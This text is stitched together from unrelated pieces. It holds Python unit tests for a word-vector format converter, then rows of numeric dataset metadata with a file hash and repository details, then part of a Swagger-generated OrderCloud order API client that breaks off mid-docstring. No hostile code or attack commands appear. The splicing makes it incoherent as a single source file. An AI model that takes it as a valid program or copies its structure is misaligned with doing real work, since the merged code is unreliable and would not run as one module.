    source_path = DATA / source
    base, _ = os.path.splitext(str(source_path))
    expected_path = base + "." + str(target_format)
    # Text formats are opened in text mode, binary formats in binary mode.
    mode = "r" if source in (GLOVE, W2V_TEXT) else "rb"
    with open(source_path, mode) as input_path:
        with patch("word_vectors.convert_module.write") as write_patch:
            words, vecs = read(input_path)
            convert(input_path, output_file_type=target_format)
            out_file, out_words, out_vecs, out_type = write_patch.call_args_list[0][0]
            assert str(out_file) == expected_path
            assert out_words == words
            np.testing.assert_allclose(out_vecs, vecs)
            assert out_type is target_format
def test_convert_with_output_open():
    """convert accepts already-open file handles for both input and output.

    The temporary output file is always cleaned up, even when setup or an
    assertion fails part-way through.
    """
    data = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
    output_type = random.choice(list(FileType))
    output = rand_str()
    input_path = DATA / data
    # Text formats use text-mode handles, binary formats binary-mode handles.
    in_mode = "r" if data in (GLOVE, W2V_TEXT) else "rb"
    out_mode = "w" if output_type in (FileType.GLOVE, FileType.W2V_TEXT) else "wb"
    try:
        with open(input_path, in_mode) as input_path:
            with open(output, out_mode) as output:
                with patch("word_vectors.convert_module.write") as write_patch:
                    w, wv = read(input_path)
                    convert(input_path, output, output_file_type=output_type)
                    call_file, call_w, call_wv, call_type = write_patch.call_args_list[0][0]
                    assert call_file == output
                    assert call_w == w
                    assert call_type == output_type
                    np.testing.assert_allclose(call_wv, wv)
    finally:
        # `output` is the file object once opened, otherwise still the bare
        # name; only remove the file if it was actually created so a setup
        # failure is not masked by a FileNotFoundError from cleanup.
        target = getattr(output, "name", output)
        if os.path.exists(target):
            os.remove(target)
def test_convert_with_input_open():
    """convert forwards an explicit input type when given open file handles.

    The temporary output file is always cleaned up, even when setup or an
    assertion fails part-way through.
    """
    data = random.choice([GLOVE, W2V, W2V_TEXT, LEADER])
    input_type = INPUT_MAPPING[data]
    output_type = random.choice(list(FileType))
    input_path = DATA / data
    output = rand_str()
    # Text formats use text-mode handles, binary formats binary-mode handles.
    in_mode = "r" if data in (GLOVE, W2V_TEXT) else "rb"
    out_mode = "w" if output_type in (FileType.GLOVE, FileType.W2V_TEXT) else "wb"
    try:
        with open(input_path, in_mode) as input_path:
            with open(output, out_mode) as output:
                with patch("word_vectors.convert_module.read") as read_patch:
                    with patch("word_vectors.convert_module.write") as write_patch:
                        w, wv = read(input_path)
                        read_patch.return_value = (w, wv)
                        convert(input_path, output, output_file_type=output_type, input_file_type=input_type)
                        read_patch.assert_called_once_with(input_path, input_type)
                        call_file, call_w, call_wv, call_type = write_patch.call_args_list[0][0]
                        assert call_file == output
                        assert call_w == w
                        assert call_type == output_type
                        np.testing.assert_allclose(call_wv, wv)
    finally:
        # `output` is the file object once opened, otherwise still the bare
        # name; only remove the file if it was actually created so a setup
        # failure is not masked by a FileNotFoundError from cleanup.
        target = getattr(output, "name", output)
        if os.path.exists(target):
            os.remove(target)
| 43.174157
| 109
| 0.660117
| 1,076
| 7,685
| 4.402416
| 0.060409
| 0.074098
| 0.044332
| 0.050665
| 0.935402
| 0.918092
| 0.913025
| 0.913025
| 0.907114
| 0.904792
| 0
| 0.008604
| 0.243852
| 7,685
| 177
| 110
| 43.418079
| 0.806574
| 0
| 0
| 0.834395
| 0
| 0
| 0.053481
| 0.051139
| 0
| 0
| 0
| 0
| 0.248408
| 1
| 0.057325
| false
| 0
| 0.057325
| 0
| 0.11465
| 0.012739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b6aa826b85b68aee168a92557d906c1fe964b4dc
| 114,702
|
py
|
Python
|
OrderCloud/apis/order_api.py
|
klreeher/python-sdk
|
b7fe922dcfc3bb73fe4149475fa45fdcb04d956a
|
[
"Apache-2.0"
] | null | null | null |
OrderCloud/apis/order_api.py
|
klreeher/python-sdk
|
b7fe922dcfc3bb73fe4149475fa45fdcb04d956a
|
[
"Apache-2.0"
] | null | null | null |
OrderCloud/apis/order_api.py
|
klreeher/python-sdk
|
b7fe922dcfc3bb73fe4149475fa45fdcb04d956a
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
OrderCloud
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 1.0
Contact: ordercloud@four51.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class OrderApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Bind the API client this instance will issue requests through.

    :param api_client: an explicit ApiClient to use; when omitted, the one
        held by the global Configuration is used (created on demand).
    """
    # Configuration() is always instantiated, matching the generated
    # behavior even when an explicit client is supplied.
    config = Configuration()
    if api_client:
        self.api_client = api_client
        return
    # Lazily create and remember a default client on the configuration.
    if not config.api_client:
        config.api_client = ApiClient()
    self.api_client = config.api_client
def add_promotion(self, direction, order_id, promo_code, **kwargs):
    """
    Add a promotion to an order.
    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously and receive the request thread instead.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.add_promotion(direction, order_id, promo_code, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param str promo_code: Promo code of the promotion. (required)
    :return: Promotion
        If the method is called asynchronously,
        returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both delegate to the same helper: it yields the
    # deserialized data directly, or the request thread when a callback is set.
    return self.add_promotion_with_http_info(direction, order_id, promo_code, **kwargs)
def add_promotion_with_http_info(self, direction, order_id, promo_code, **kwargs):
    """
    POST /orders/{direction}/{orderID}/promotions/{promoCode}.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.add_promotion_with_http_info(direction, order_id, promo_code, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param str promo_code: Promo code of the promotion. (required)
    :return: Promotion
        If the method is called asynchronously,
        returns the request thread.
    """
    # NOTE: generated code — `params = locals()` below captures the positional
    # arguments by their local names, so names and statement order must not change.
    all_params = ['direction', 'order_id', 'promo_code']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    params = locals()
    # Fold **kwargs into params, rejecting anything this endpoint does not accept.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_promotion" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'direction' is set
    if ('direction' not in params) or (params['direction'] is None):
        raise ValueError("Missing the required parameter `direction` when calling `add_promotion`")
    # verify the required parameter 'order_id' is set
    if ('order_id' not in params) or (params['order_id'] is None):
        raise ValueError("Missing the required parameter `order_id` when calling `add_promotion`")
    # verify the required parameter 'promo_code' is set
    if ('promo_code' not in params) or (params['promo_code'] is None):
        raise ValueError("Missing the required parameter `promo_code` when calling `add_promotion`")
    # URL template; the swagger '{format}' placeholder is pinned to json.
    resource_path = '/orders/{direction}/{orderID}/promotions/{promoCode}'.replace('{format}', 'json')
    path_params = {}
    if 'direction' in params:
        path_params['direction'] = params['direction']
    if 'order_id' in params:
        path_params['orderID'] = params['order_id']
    if 'promo_code' in params:
        path_params['promoCode'] = params['promo_code']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept` — dropped entirely if the client negotiates none.
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
    # Authentication setting
    auth_settings = ['oauth2']
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Promotion',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def approve(self, direction, order_id, order_approval_info, **kwargs):
    """
    Approve an order.
    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously and receive the request thread instead.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.approve(direction, order_id, order_approval_info, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param OrderApprovalInfo order_approval_info: (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both delegate to the same helper: it yields the
    # deserialized data directly, or the request thread when a callback is set.
    return self.approve_with_http_info(direction, order_id, order_approval_info, **kwargs)
def approve_with_http_info(self, direction, order_id, order_approval_info, **kwargs):
    """
    POST /orders/{direction}/{orderID}/approve.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.approve_with_http_info(direction, order_id, order_approval_info, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param OrderApprovalInfo order_approval_info: (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    # NOTE: generated code — `params = locals()` below captures the positional
    # arguments by their local names, so names and statement order must not change.
    all_params = ['direction', 'order_id', 'order_approval_info']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    params = locals()
    # Fold **kwargs into params, rejecting anything this endpoint does not accept.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method approve" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'direction' is set
    if ('direction' not in params) or (params['direction'] is None):
        raise ValueError("Missing the required parameter `direction` when calling `approve`")
    # verify the required parameter 'order_id' is set
    if ('order_id' not in params) or (params['order_id'] is None):
        raise ValueError("Missing the required parameter `order_id` when calling `approve`")
    # verify the required parameter 'order_approval_info' is set
    if ('order_approval_info' not in params) or (params['order_approval_info'] is None):
        raise ValueError("Missing the required parameter `order_approval_info` when calling `approve`")
    # URL template; the swagger '{format}' placeholder is pinned to json.
    resource_path = '/orders/{direction}/{orderID}/approve'.replace('{format}', 'json')
    path_params = {}
    if 'direction' in params:
        path_params['direction'] = params['direction']
    if 'order_id' in params:
        path_params['orderID'] = params['order_id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # The approval info travels as the JSON request body.
    if 'order_approval_info' in params:
        body_params = params['order_approval_info']
    # HTTP header `Accept` — dropped entirely if the client negotiates none.
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
    # Authentication setting
    auth_settings = ['oauth2']
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Order',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def cancel(self, direction, order_id, **kwargs):
    """
    Cancel an order.
    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously and receive the request thread instead.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.cancel(direction, order_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both delegate to the same helper: it yields the
    # deserialized data directly, or the request thread when a callback is set.
    return self.cancel_with_http_info(direction, order_id, **kwargs)
def cancel_with_http_info(self, direction, order_id, **kwargs):
    """
    POST /orders/{direction}/{orderID}/cancel.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.cancel_with_http_info(direction, order_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    # NOTE: generated code — `params = locals()` below captures the positional
    # arguments by their local names, so names and statement order must not change.
    all_params = ['direction', 'order_id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    params = locals()
    # Fold **kwargs into params, rejecting anything this endpoint does not accept.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method cancel" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'direction' is set
    if ('direction' not in params) or (params['direction'] is None):
        raise ValueError("Missing the required parameter `direction` when calling `cancel`")
    # verify the required parameter 'order_id' is set
    if ('order_id' not in params) or (params['order_id'] is None):
        raise ValueError("Missing the required parameter `order_id` when calling `cancel`")
    # URL template; the swagger '{format}' placeholder is pinned to json.
    resource_path = '/orders/{direction}/{orderID}/cancel'.replace('{format}', 'json')
    path_params = {}
    if 'direction' in params:
        path_params['direction'] = params['direction']
    if 'order_id' in params:
        path_params['orderID'] = params['order_id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept` — dropped entirely if the client negotiates none.
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
    # Authentication setting
    auth_settings = ['oauth2']
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Order',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def create(self, direction, order, **kwargs):
    """
    Create an order.
    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously and receive the request thread instead.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.create(direction, order, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param Order order: (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both delegate to the same helper: it yields the
    # deserialized data directly, or the request thread when a callback is set.
    return self.create_with_http_info(direction, order, **kwargs)
def create_with_http_info(self, direction, order, **kwargs):
    """
    POST /orders/{direction}.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.create_with_http_info(direction, order, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param Order order: (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    # NOTE: generated code — `params = locals()` below captures the positional
    # arguments by their local names, so names and statement order must not change.
    all_params = ['direction', 'order']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    params = locals()
    # Fold **kwargs into params, rejecting anything this endpoint does not accept.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'direction' is set
    if ('direction' not in params) or (params['direction'] is None):
        raise ValueError("Missing the required parameter `direction` when calling `create`")
    # verify the required parameter 'order' is set
    if ('order' not in params) or (params['order'] is None):
        raise ValueError("Missing the required parameter `order` when calling `create`")
    # URL template; the swagger '{format}' placeholder is pinned to json.
    resource_path = '/orders/{direction}'.replace('{format}', 'json')
    path_params = {}
    if 'direction' in params:
        path_params['direction'] = params['direction']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # The order payload travels as the JSON request body.
    if 'order' in params:
        body_params = params['order']
    # HTTP header `Accept` — dropped entirely if the client negotiates none.
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
    # Authentication setting
    auth_settings = ['oauth2']
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Order',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def decline(self, direction, order_id, order_approval_info, **kwargs):
    """
    Decline an order.
    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously and receive the request thread instead.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.decline(direction, order_id, order_approval_info, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param OrderApprovalInfo order_approval_info: (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both delegate to the same helper: it yields the
    # deserialized data directly, or the request thread when a callback is set.
    return self.decline_with_http_info(direction, order_id, order_approval_info, **kwargs)
def decline_with_http_info(self, direction, order_id, order_approval_info, **kwargs):
    """
    POST /orders/{direction}/{orderID}/decline.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.decline_with_http_info(direction, order_id, order_approval_info, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :param OrderApprovalInfo order_approval_info: (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    # NOTE: generated code — `params = locals()` below captures the positional
    # arguments by their local names, so names and statement order must not change.
    all_params = ['direction', 'order_id', 'order_approval_info']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    params = locals()
    # Fold **kwargs into params, rejecting anything this endpoint does not accept.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method decline" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'direction' is set
    if ('direction' not in params) or (params['direction'] is None):
        raise ValueError("Missing the required parameter `direction` when calling `decline`")
    # verify the required parameter 'order_id' is set
    if ('order_id' not in params) or (params['order_id'] is None):
        raise ValueError("Missing the required parameter `order_id` when calling `decline`")
    # verify the required parameter 'order_approval_info' is set
    if ('order_approval_info' not in params) or (params['order_approval_info'] is None):
        raise ValueError("Missing the required parameter `order_approval_info` when calling `decline`")
    # URL template; the swagger '{format}' placeholder is pinned to json.
    resource_path = '/orders/{direction}/{orderID}/decline'.replace('{format}', 'json')
    path_params = {}
    if 'direction' in params:
        path_params['direction'] = params['direction']
    if 'order_id' in params:
        path_params['orderID'] = params['order_id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # The approval info travels as the JSON request body.
    if 'order_approval_info' in params:
        body_params = params['order_approval_info']
    # HTTP header `Accept` — dropped entirely if the client negotiates none.
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
    # Authentication setting
    auth_settings = ['oauth2']
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Order',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def delete(self, direction, order_id, **kwargs):
    """
    Delete an order.
    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously and receive the request thread instead.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.delete(direction, order_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both delegate to the same helper: it yields the
    # deserialized data directly, or the request thread when a callback is set.
    return self.delete_with_http_info(direction, order_id, **kwargs)
def delete_with_http_info(self, direction, order_id, **kwargs):
    """
    DELETE /orders/{direction}/{orderID}.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.delete_with_http_info(direction, order_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # NOTE: generated code — `params = locals()` below captures the positional
    # arguments by their local names, so names and statement order must not change.
    all_params = ['direction', 'order_id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    params = locals()
    # Fold **kwargs into params, rejecting anything this endpoint does not accept.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'direction' is set
    if ('direction' not in params) or (params['direction'] is None):
        raise ValueError("Missing the required parameter `direction` when calling `delete`")
    # verify the required parameter 'order_id' is set
    if ('order_id' not in params) or (params['order_id'] is None):
        raise ValueError("Missing the required parameter `order_id` when calling `delete`")
    # URL template; the swagger '{format}' placeholder is pinned to json.
    resource_path = '/orders/{direction}/{orderID}'.replace('{format}', 'json')
    path_params = {}
    if 'direction' in params:
        path_params['direction'] = params['direction']
    if 'order_id' in params:
        path_params['orderID'] = params['order_id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept` — dropped entirely if the client negotiates none.
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
    # Authentication setting
    auth_settings = ['oauth2']
    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def get(self, direction, order_id, **kwargs):
    """
    Retrieve a single order.
    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously and receive the request thread instead.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get(direction, order_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both delegate to the same helper: it yields the
    # deserialized data directly, or the request thread when a callback is set.
    return self.get_with_http_info(direction, order_id, **kwargs)
def get_with_http_info(self, direction, order_id, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_with_http_info(direction, order_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str order_id: ID of the order. (required)
    :return: Order
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of every keyword argument this endpoint understands.
    all_params = ['direction', 'order_id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # Snapshot the call's locals (self, direction, order_id, kwargs) so
    # positional and keyword arguments can be handled uniformly below.
    # NOTE: locals() must be captured before any other local is assigned.
    params = locals()
    # Reject unknown kwargs, then fold the accepted ones into `params`.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'direction' is set
    if ('direction' not in params) or (params['direction'] is None):
        raise ValueError("Missing the required parameter `direction` when calling `get`")
    # verify the required parameter 'order_id' is set
    if ('order_id' not in params) or (params['order_id'] is None):
        raise ValueError("Missing the required parameter `order_id` when calling `get`")
    resource_path = '/orders/{direction}/{orderID}'.replace('{format}', 'json')
    # Map snake_case Python names onto the camelCase path placeholders.
    path_params = {}
    if 'direction' in params:
        path_params['direction'] = params['direction']
    if 'order_id' in params:
        path_params['orderID'] = params['order_id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
    # Authentication setting
    auth_settings = ['oauth2']
    # Response is deserialized into an Order model by the api_client.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Order',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def list(self, direction, **kwargs):
    """
    List orders, optionally filtered, searched, sorted and paged.

    The request is synchronous by default. Supply a `callback` function
    kwarg to run it asynchronously; the request thread is then returned
    instead of the deserialized response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.list(direction, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str buyer_id: ID of the buyer.
    :param str supplier_id: ID of the supplier.
    :param str _from: Lower bound of date range that the order was created.
    :param str to: Upper bound of date range that the order was created.
    :param str search: Word or phrase to search for.
    :param str search_on: Comma-delimited list of fields to search on.
    :param str sort_by: Comma-delimited list of fields to sort by.
    :param int page: Page of results to return. Default: 1
    :param int page_size: Number of results to return per page. Default: 20, max: 100.
    :param dict(str, str) filters: Any additional key/value pairs passed in the query string are interpreted as filters. Valid keys are top-level properties of the returned model or 'xp.???'
    :return: ListOrder
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always unwraps the deserialized payload
    # rather than the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Delegation covers both modes: with a `callback` kwarg the underlying
    # call yields the request thread, otherwise the ListOrder page.
    return self.list_with_http_info(direction, **kwargs)
def list_with_http_info(self, direction, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.list_with_http_info(direction, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
    :param str buyer_id: ID of the buyer.
    :param str supplier_id: ID of the supplier.
    :param str _from: Lower bound of date range that the order was created.
    :param str to: Upper bound of date range that the order was created.
    :param str search: Word or phrase to search for.
    :param str search_on: Comma-delimited list of fields to search on.
    :param str sort_by: Comma-delimited list of fields to sort by.
    :param int page: Page of results to return. Default: 1
    :param int page_size: Number of results to return per page. Default: 20, max: 100.
